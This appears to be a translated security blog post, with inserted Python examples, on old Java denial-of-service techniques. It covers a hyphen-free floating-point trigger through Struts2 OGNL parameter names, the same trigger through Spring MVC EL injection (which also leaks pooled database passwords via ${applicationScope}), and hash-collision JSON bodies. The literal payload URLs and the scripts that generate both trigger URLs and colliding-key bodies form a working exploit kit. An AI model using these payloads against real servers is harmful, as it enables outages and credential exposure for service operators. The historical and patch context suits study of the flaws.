Struts2 dos
This was originally a 0-day. It is an old 0-day now, and it has been fixed in newer versions.
The principle is this: request http://wwwxxx.net/app/secTest.action?(new java.lang.Double(2.2250738585072012e-308)) with the OGNL expression as the parameter name. While Struts2 processes the parameters, the framework converts the literal to the Double type. In theory this should not get through: the parameter name contains a hyphen (the minus sign in e-308), so the Struts2 parameters interceptor rejects it. So I tried to bypass it. The URL below is very long, but it contains no hyphen, so it is accepted:
http://www.inbreak.net/app/secTest.action?(new java.lang.Double(0.000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000022250738585072012))
All this does is write the same value in ordinary decimal notation instead of scientific notation.
This is an old vulnerability. If you run into an application that this old exploit still works against, do not hesitate to upgrade to the latest Struts2. The remote execution exploits for it are more powerful still.
Spring mvc dos
Spring MVC has a DoS as well. Earlier versions of Spring MVC had an information disclosure vulnerability: as long as a parameter value is ${applicationScope}, the contents of the application scope are displayed, and that is a sensitive area. An attacker can directly read the database connection pool, which holds the database password; most applications keep the password there. But for plenty of applications, even the database password is no help to the attack. So, in frustration, we turn to DoS.
Let's talk about the principle. The application information is displayed because there is EL expression injection at this point. EL is a simple language that is not very useful for attacks, but it does have basic type conversion. So we can send:
http://localhost:8080/index.htm?message=${0.0000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000022250738585072012}
The value of this message parameter is evaluated by the EL expression engine. When it sees a literal of this form, it automatically converts it to the Double type, which triggers the "Java floating-point vulnerability" mentioned above. This is a new way of using that bug; I call it 0-day-level usage.
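The Struts2 payload and the Spring MVC payload above differ only in their wrapper (an OGNL expression in the parameter name, an EL expression in the parameter value); both depend on writing the trigger value out in plain decimal without miscounting a single zero, because a different zero count is a different number that does not hit the bug. The following is an added example, not the original author's code: it expands the scientific-notation value with Python's Decimal so the digit count is exact, builds both URLs, and applies a hyphen check modeled on the post's description of the Struts2 parameters interceptor. The base URLs, the parameter name message, and the exact accepted-name pattern are assumptions.

```python
"""Build the plain-decimal trigger payloads described in the post.

Added example, not code from the original post. The accepted-name pattern below
is an assumption modeled on the post's statement that parameter names containing
a hyphen are rejected; check it against the Struts2 version you are looking at.
"""
import re
from decimal import Decimal
from urllib.parse import quote

# The trigger value for the Java floating-point parse hang, in scientific notation.
TRIGGER_SCI = "2.2250738585072012e-308"

# ASSUMPTION: approximation of the old Struts2 accepted parameter-name pattern.
# What matters for the post is that '-' (and therefore 'e-308') is not allowed.
ACCEPTED_NAME = re.compile(r"^[a-zA-Z0-9.\[\]()_'\s]+$")


def expand_plain_decimal(sci: str) -> str:
    """Rewrite a scientific-notation literal as plain positional decimal.

    Decimal is used instead of float so no digits are lost: the result must be
    the same number, only spelled without the 'e' and the minus sign.
    """
    d = Decimal(sci)
    plain = format(d, "f")          # 'f' formatting never emits an exponent
    if Decimal(plain) != d:         # round-trip check: same value, new spelling
        raise ValueError("expansion changed the value")
    return plain


def struts2_param_name(literal: str) -> str:
    """OGNL expression used as the parameter *name* (Struts2 case)."""
    return f"(new java.lang.Double({literal}))"


def spring_el_value(literal: str) -> str:
    """EL expression used as the parameter *value* (Spring MVC case)."""
    return "${" + literal + "}"


def is_interceptor_acceptable(name: str) -> bool:
    """True if the name would pass the (assumed) Struts2 accepted-name check."""
    return ACCEPTED_NAME.match(name) is not None


def build_urls(struts_action: str, spring_page: str, sci: str = TRIGGER_SCI) -> dict:
    """Return both request URLs built from the plain-decimal form of `sci`."""
    plain = expand_plain_decimal(sci)
    return {
        "struts2": f"{struts_action}?{quote(struts2_param_name(plain), safe='()')}",
        "spring": f"{spring_page}?message={quote(spring_el_value(plain), safe='${}')}",
    }


if __name__ == "__main__":
    plain = expand_plain_decimal(TRIGGER_SCI)
    print(len(plain), "characters; hyphen-free:", "-" not in plain)
    print("scientific form accepted by interceptor:",
          is_interceptor_acceptable(struts2_param_name(TRIGGER_SCI)))
    print("plain form accepted by interceptor:",
          is_interceptor_acceptable(struts2_param_name(plain)))
    for name, url in build_urls("http://wwwxxx.net/app/secTest.action",
                                "http://localhost:8080/index.htm").items():
        print(name, url[:60] + "...")
```

The round-trip check in expand_plain_decimal is the part worth keeping: the expanded literal is 326 characters of mostly zeros, and the only way to be sure a hand-copied version still denotes 2.2250738585072012e-308 is to parse it back and compare.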
Evil java hash dos Attacks
The content of this section was contributed to an article on wooyun, so I decided to hold most of it back here. But it is the root cause of the vulnerability, so it has to be mentioned briefly. Some time ago there was a very fierce attack, the "Java hash collision denial of service", which cuts across languages, servers and web containers; countless applications fall to the same attack. That article mentioned the "JSON object denial of service", which works against every JSON object implementation, because they all store their members in a hash map. A JSON object lets an application receive a string and convert it into a JSON object, for example:
{"aaaaa":"bbbbb","ccccc":"ddddd"}
Because JSON objects are backed by hash maps, once a web application takes user parameters and converts them to JSON, an attacker can submit crafted JSON with colliding keys to the web application and cause a DoS.
When such a packet is submitted, the web application can have its CPU saturated. In practice this attack is still limited: not every application implements this conversion. But if the framework does it automatically, every application on that framework can be hit in one go.
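To make the hash-map point concrete, the following is an added example, not the original author's code or the wooyun article's. It generates keys that all share the same Java String.hashCode() (using the well-known "Aa"/"BB" pair, whose concatenations also collide), emits a JSON body built from them, and inserts the keys into a small chained hash table using Java's hash to count how many key comparisons the inserts cost. The table is a model of a pre-Java-8 HashMap bucket, not any parser's real code; the key count and the value "x" are arbitrary choices.

```python
"""Colliding-key JSON body for the hash-map DoS described in the post.

Added example, not code from the original post. ChainedTable is a toy model of a
linked-list bucket; it exists only to count the work the colliding keys cause.
"""
import json
from itertools import product


def java_string_hash(s: str) -> int:
    """Java's String.hashCode(): h = 31*h + c with 32-bit signed wraparound."""
    h = 0
    for ch in s:
        h = (31 * h + ord(ch)) & 0xFFFFFFFF
    return h - (1 << 32) if h >= (1 << 31) else h


def colliding_keys(n_blocks: int) -> list:
    """Return 2**n_blocks distinct strings with identical Java hashCode.

    'Aa' and 'BB' both hash to 2112. Concatenating equal-length blocks with equal
    hashes gives equal hashes again (hash(XY) = hash(X)*31**len(Y) + hash(Y)),
    so every combination of n blocks collides.
    """
    blocks = ("Aa", "BB")
    assert java_string_hash(blocks[0]) == java_string_hash(blocks[1])
    return ["".join(combo) for combo in product(blocks, repeat=n_blocks)]


def json_dos_body(n_blocks: int) -> str:
    """JSON object whose keys all land in one bucket of a Java-hashed map."""
    return json.dumps({k: "x" for k in colliding_keys(n_blocks)})


class ChainedTable:
    """Minimal chained hash table using Java's hash (model, not a real HashMap)."""

    def __init__(self, nbuckets: int = 16):
        self.buckets = [[] for _ in range(nbuckets)]
        self.comparisons = 0  # key comparisons performed by put()

    def put(self, key: str, value) -> None:
        bucket = self.buckets[java_string_hash(key) % len(self.buckets)]
        for i, (k, _) in enumerate(bucket):
            self.comparisons += 1
            if k == key:
                bucket[i] = (key, value)
                return
        bucket.append((key, value))


def insertion_cost(keys) -> tuple:
    """(total key comparisons, longest chain) after inserting all keys.

    With n colliding keys every insert walks the whole chain, so comparisons
    grow as n*(n-1)/2 and the longest chain is n.
    """
    table = ChainedTable()
    for k in keys:
        table.put(k, "x")
    return table.comparisons, max(len(b) for b in table.buckets)


if __name__ == "__main__":
    bad = colliding_keys(10)                      # 1024 keys, one hash value
    good = [f"key{i}" for i in range(len(bad))]  # 1024 ordinary keys
    print("colliding keys:", insertion_cost(bad))
    print("ordinary keys: ", insertion_cost(good))
    print("body size:", len(json_dos_body(10)), "bytes")
```

Doubling n_blocks squares the work, which is why a request body of a few hundred kilobytes was enough. Two caveats from the Java side: Java 8's HashMap converts a long bucket chain into a balanced tree, and String keys are Comparable, so on Java 8 this particular key set costs O(log n) per insert rather than O(n); and a JSON library that does not use a Java-hashed map (or that rejects duplicate-looking or oversized objects) is not affected in the same way. The point of the post stands for the older containers it was written about.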